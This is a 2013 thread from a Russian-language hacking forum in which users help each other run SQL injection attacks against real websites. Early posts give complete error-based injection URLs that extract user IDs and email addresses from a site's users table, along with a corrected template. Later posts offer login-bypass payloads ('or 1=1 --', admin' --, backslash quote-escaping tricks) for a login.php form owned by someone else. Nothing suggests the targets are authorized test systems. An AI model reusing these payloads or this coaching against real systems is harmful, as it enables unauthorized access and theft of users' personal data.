ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.10.2013, 17:46
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме:
189651
Репутация:
-5
|
|
Вобщем делаю sql запрос:
site.ru/?file=2+and(select+1+from(select+count(*),concat(( select+(select+(select+concat(0x7e,0x27,s_Users.Id ,0x27,0x7e)+from+`base_1`.s_Users+Order+by+Id+limi t+0,1)+)+from+`information_schema`.tables+limit+0, 1),floor(rand(0)*2))x+from+`information_schema`.ta bles+group+by+x)a)+and+1=1
На что мне благополучно выдает Duplicate entry '~'1'~1' for key 'group_key'. т.е выдает нужны резульат.
Делаем еще один запрос:
site.ru/?file=2+and(select+1+from(select+count(*),concat(( select+(select+(select+concat(0x7e,0x27,s_Users.Em ail,0x27,0x7e)+from+`base_1`.s_Users+Order+by+Id+l imit+0,1)+)+from+`information_schema`.tables+limit +0,1),floor(rand(0)*2))x+from+`information_schema` .tables+group+by+x)a)+and+1=1
На что мне выдает: Subquery returns more than 1 row - чертов лимин(((
Подскажите, как выполнить второй запрос - чтобы избежать лимита.
|
|
|
02.10.2013, 18:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
44130
Репутация:
26
|
|
Сообщение от Evil_Genius
Evil_Genius said:
Вобщем делаю sql запрос:
site.ru/?file=2+and(select+1+from(select+count(*),concat(( select+(select+(select+concat(0x7e,0x27,s_Users.Id ,0x27,0x7e)+from+`base_1`.s_Users+Order+by+Id+limi t+0,1)+)+from+`information_schema`.tables+limit+0, 1),floor(rand(0)*2))x+from+`information_schema`.ta bles+group+by+x)a)+and+1=1
На что мне благополучно выдает Duplicate entry '~'1'~1' for key 'group_key'. т.е выдает нужны резульат.
Делаем еще один запрос:
site.ru/?file=2+and(select+1+from(select+count(*),concat(( select+(select+(select+concat(0x7e,0x27,s_Users.Em ail,0x27,0x7e)+from+`base_1`.s_Users+Order+by+Id+l imit+0,1)+)+from+`information_schema`.tables+limit +0,1),floor(rand(0)*2))x+from+`information_schema` .tables+group+by+x)a)+and+1=1
На что мне выдает: Subquery returns more than 1 row - чертов лимин(((
Подскажите, как выполнить второй запрос - чтобы избежать лимита.
У тебя лишнее
Код:
Code:
+from+`information_schema`.tables+limit+0,1
Возьми шаблон, и переделай под свой запрос
Код:
Code:
(select 1 from(select count(*),concat((select table_name from information_schema.tables order by schema_name limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
?file=2+and(select 1 from(select count(*),concat((select table_name from information_schema.tables order by schema_name limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and 1=1
p.s. результат подзапроса должен быть - одна строка.
|
|
|
|
03.10.2013, 17:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
12404
Репутация:
0
|
|
В общем есть сайт, на нем login.php
При пост запросе:
Head
Host: сайт.нет
Content-Type: application/x-www-form-urlencoded
post
login=1&password=%5c
Выдает следующее
Раскрутить скулю не поможете?
Не знаю что дальше делать) |
|
|
|
03.10.2013, 17:41
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от zombak18
zombak18 said:
В общем есть сайт, на нем login.php
При пост запросе:
Head
Host: сайт.нет
Content-Type: application/x-www-form-urlencoded
post
login=1&password=%5c
Выдает следующее
Раскрутить скулю не поможете?
Не знаю что дальше делать) Если кавычки фильтруются и в имени то-же самое, то тогда так:
Код:
Code:
Имя пользователя: \
Пароль: union select .... -- 1
|
|
|
|
03.10.2013, 17:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
12404
Репутация:
0
|
|
Сообщение от XAMEHA
XAMEHA said:
Если кавычки фильтруются и в имени то-же самое, то тогда так:
Код:
Code:
Имя пользователя: \
Пароль: union select .... -- 1
При таком запросе ничего не происходит(
login=\&password=union select .... -- 1
/а во!
вставил в поля
и что дальше?(
|
|
|
|
03.10.2013, 19:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от zombak18
zombak18 said:
При таком запросе ничего не происходит(
login=\&password=union select .... -- 1
/а во!
вставил в поля
и что дальше?( Почитать фак. Но если уж ооочень не хочется, то вместо точек, тебе надо было подставить свой запрос, а точнее начать выяснять количество колонок в таблице.
|
|
|
|
03.10.2013, 19:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Сообщение от zombak18
zombak18 said:
login=\&password=union select .... -- 1
login=admin' -- t&password=1
Попробуйте.
|
|
|
|
03.10.2013, 19:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
12404
Репутация:
0
|
|
Сообщение от Inoms
Inoms said:
login=admin' -- t&password=1
Попробуйте.
Нет, так не хочет.. походу сама дыра в обработке пароля, а не в логине
Сообщение от Melfis
Melfis said:
Почитать фак. Но если уж ооочень не хочется, то вместо точек, тебе надо было подставить свой запрос, а точнее начать выяснять количество колонок в таблице.
Например?
|
|
|
|
03.10.2013, 19:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Нет, это потому что на конце логина дописался слеш ,я его не заметил, такого пользователя естественно нет в базе. Хотя ещё не совсем понятно, как там с ковычками обстоят дела
login=admin&password=' or 1=1 -- t
Вполне может сработать.
|
|
|
|
03.10.2013, 19:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
12404
Репутация:
0
|
|
Сообщение от Inoms
Inoms said:
Нет, это потому что на конце логина дописался слеш ,я его не заметил, такого пользователя естественно нет в базе. Хотя ещё не совсем понятно, как там с ковычками обстоят дела
login=admin&password=' or 1=1 -- t
Вполне может сработать.
такой игнорит(
а просто на проверку символов
'. %5c' не игнорит..
всё с %5c походу ошибку кидает
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
